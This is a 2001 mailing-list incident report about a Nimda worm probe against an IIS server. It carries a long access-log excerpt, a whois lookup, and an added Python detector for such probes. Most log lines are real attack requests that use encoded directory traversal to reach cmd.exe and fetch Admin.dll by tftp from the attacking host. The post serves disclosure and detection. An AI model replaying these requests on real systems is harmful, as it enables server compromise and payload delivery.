Security Incidents mailing list archives

Microsoft's Early Xmas Present.


From: "Jay D. Dyson" <jdyson () treachery net>
Date: Fri, 28 Dec 2001 18:11:23 -0800 (PST)

-----BEGIN PGP SIGNED MESSAGE-----

Hi folks,

        Normally I wouldn't be sending this out, but I figure folks need
to be aware and wary, considering the origin of this intrusion attempt.

        I received an early Xmas present from Microsoft.  No, I didn't get
XP, nor did I get the latest Office software suite.

        I got a Nimda intrusion attempt.

        Early Bird[1] picked up on this intrusion attempt and immediately
notified Microsoft.  I've yet to hear back from Microsoft as to why this
attack from their network came to pass[2].

        For those who are interested, here's the log excerpt. 

208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:56 -0800] "GET /scripts/Admin.dll HTTP/1.0" 200 361 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:06 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 365 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:17 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 419 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:27 -0800] "GET /MSADC/Admin.dll HTTP/1.0" 200 359 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:37 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:51 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:07 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:18 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:28 -0800] "GET /c/Admin.dll HTTP/1.0" 200 355 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:49 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:59 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:09 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:23 -0800] "GET /d/Admin.dll HTTP/1.0" 200 355 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:54 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:10 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:24 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:35 -0800] "GET /scripts/..%255c../Admin.dll HTTP/1.0" 200 371 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:45 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:00 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:11 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:25 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:40 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:51 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:17 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:31 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:46 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:57 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 440 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:12 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:37 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:52 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dll HTTP/1.0" 200 420 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:03 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:18 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:29 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:43 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:58 -0800] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:29 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:40 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:50 -0800] "GET /scripts/..%c0%af../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:09 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:20 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:31 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:41 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:51 -0800] "GET /scripts/..%c1%9c../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 395 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:12 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:23 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:33 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:43 -0800] "GET /scripts/..%25%35%63../Admin.dll HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:57 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:13 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:28 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:44 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:58 -0800] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 371 "-" "-"

$ whois -h whois.arin.net 208.229.100.126

Microsoft Labs (NETBLK-UU-208-229-100-D1)
   One Microsoft Way
   Redmond, WA 98052
   US

   Netname: UU-208-229-100-D1
   Netblock: 208.229.100.0 - 208.229.101.255

   Coordinator:
      Steig, Rick  (RS8676-ARIN)  a-rickst () MICROSOFT COM
      (425) 703-3061

   Record last updated on 03-Nov-1997.
   Database last updated on  27-Dec-2001 19:55:32 EDT.

- -Jay

1.      http://www.treachery.net/earlybird/
2.      If anyone from Microsoft is reading this, I'd appreciate something
        more pleasant next holiday season.  (FYI, the machine you hit ran
        XP for only 15 seconds.  It now runs Linux.)

   (    (                                                        _______
   ))   ))   .-"There's always time for a good cup of coffee"-.   >====<--.
 C|~~|C|~~| (>----- Jay D. Dyson -- jdyson () treachery net -----<) |    = |-'
  `--' `--'  `---------- Si vis pacem, para bellum. ----------'  `------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBPC0YPrlDRyqRQ2a9AQFXDAQAoXxjVbh6fTzpUPyQFB8aJGpxOLg/+Om+
1Zck8Fw7/tfKsq97YLSqSsp2r4Q5+ybQqXxdnbLVgVsPhKhazzXNrcPKWXhYQU8q
BYT1edg658tvKND0I5NeWoU+vzqzR0NPtppmBKCEMlwz+zG2Nz3nTzT7jMpzmxPo
uNDtpRKBcGs=
=9DpW
-----END PGP SIGNATURE-----
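
Added example (not part of Jay's post, nor Early Bird's code): a small Python detector that runs over log lines in the format shown above, undoes the path encodings the worm cycled through (the %255c / %252f double encoding, the %%35%63 variants, and the %c0%af / %c1%1c / %c1%9c overlong UTF-8 forms), and flags the three stages visible in the log: reaching cmd.exe or root.exe, the "tftp -i <host> GET Admin.dll" fetch, and the follow-up request for Admin.dll itself. The decoding model (two percent-decode passes, then lax acceptance of any two-byte sequence that collapses to an ASCII byte) is an approximation of a permissive server, not IIS's actual code path. The first seven sample lines are copied from the log in the post; the last benign line is constructed.

```python
"""Nimda-style IIS probe detector for NCSA/Apache combined log lines (added example)."""
import re
from typing import Optional
from urllib.parse import unquote_plus, unquote_to_bytes

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
OVERLONG_RE = re.compile(r'%c[01]%[0-9a-f]{2}', re.I)      # %c0%af, %c1%1c, %c1%9c ...
DOUBLE_RE = re.compile(r'%25|%%', re.I)                     # %255c, %252f, %%35%63 ...
TFTP_RE = re.compile(r'\btftp\s+-i\s+(\S+)\s+get\s+(\S+)', re.I)
SHELL_NAMES = ('cmd.exe', 'root.exe')

# Seven lines copied from the log above plus one constructed benign request.
SAMPLE_LOG = [
    '208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"',
    '208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-"',
    '208.229.100.126 - - [24/Dec/2001:19:34:56 -0800] "GET /scripts/Admin.dll HTTP/1.0" 200 361 "-" "-"',
    '208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"',
    '208.229.100.126 - - [24/Dec/2001:19:42:03 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"',
    '208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"',
    '10.0.0.5 - - [24/Dec/2001:20:00:00 -0800] "GET /index.html HTTP/1.0" 200 1043 "-" "-"',  # constructed
]


def decode_overlong(data: bytes) -> bytes:
    """Collapse overlong two-byte UTF-8 forms of ASCII (C0 AF -> '/', C1 1C -> '\\').

    A strict decoder rejects these. The lax decoder modelled here accepts any
    lead byte C0..DF and takes the low six bits of the following byte, which is
    what lets %c1%1c (second byte not even a valid continuation) become '\\'.
    Genuine two-byte characters (code point >= 0x80) are left untouched."""
    out, i = bytearray(), 0
    while i < len(data):
        lead = data[i]
        if 0xC0 <= lead <= 0xDF and i + 1 < len(data):
            cp = ((lead & 0x1F) << 6) | (data[i + 1] & 0x3F)
            if cp < 0x80:
                out.append(cp)
                i += 2
                continue
        out.append(lead)
        i += 1
    return bytes(out)


def decode_path(target: str) -> str:
    """Percent-decode twice (so %255c -> %5c -> '\\'), then fold overlong UTF-8 and '\\' -> '/'."""
    path = target.split('?', 1)[0]
    once = unquote_to_bytes(path)
    twice = unquote_to_bytes(once) if b'%' in once else once
    return decode_overlong(twice).replace(b'\\', b'/').decode('latin-1')


def canonical_path(decoded: str) -> str:
    """Resolve '.' and '..' segments the way the filesystem would; lower-case for matching."""
    parts = []
    for seg in decoded.split('/'):
        if seg == '..':
            if parts:
                parts.pop()
        elif seg and seg != '.':
            parts.append(seg)
    return '/' + '/'.join(parts).lower()


def classify(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m['target']
    decoded = decode_path(target)
    path = canonical_path(decoded)
    query = unquote_plus(target.split('?', 1)[1]) if '?' in target else ''
    tags, encodings = set(), set()
    if path.rsplit('/', 1)[-1] in SHELL_NAMES:
        tags.add('shell_exec')                     # cmd.exe / root.exe reached
    if '/../' in decoded or decoded.startswith('../'):
        tags.add('traversal')                      # escaped the virtual directory
    if path.endswith('/admin.dll'):
        tags.add('admin_dll')                      # request for the dropped payload
    tftp = TFTP_RE.search(query)
    if tftp:
        tags.add('tftp_fetch')                     # "tftp -i <host> GET <file>"
    if DOUBLE_RE.search(target):
        encodings.add('double_percent')
    if OVERLONG_RE.search(target):
        encodings.add('overlong_utf8')
    return {'ip': m['ip'], 'ts': m['ts'], 'status': int(m['status']), 'path': path,
            'tags': sorted(tags), 'encodings': sorted(encodings),
            'tftp_source': tftp.group(1) if tftp else None,
            'tftp_file': tftp.group(2) if tftp else None}


def summarize(lines) -> dict:
    """Aggregate: how many probes, from which hosts, pulling from where, using which tricks."""
    probes, tftp_sources, encodings = [], set(), set()
    for line in lines:
        f = classify(line)
        if f and f['tags']:
            probes.append(f)
            encodings.update(f['encodings'])
            if f['tftp_source']:
                tftp_sources.add(f['tftp_source'])
    return {'probe_count': len(probes), 'attackers': sorted({f['ip'] for f in probes}),
            'tftp_sources': sorted(tftp_sources), 'encodings': sorted(encodings)}


if __name__ == '__main__':
    for entry in SAMPLE_LOG:
        print(classify(entry))
    print(summarize(SAMPLE_LOG))
```

Note that the detector keys on what the request would resolve to after decoding, not on the server's reply: the %%35%63 and %c0%2f lines drew 400 and 404 above, but they are still attempts to reach cmd.exe and are counted as such. The tftp source address is worth extracting separately, since in worm traffic it is normally the infected host itself, as it is here.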


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

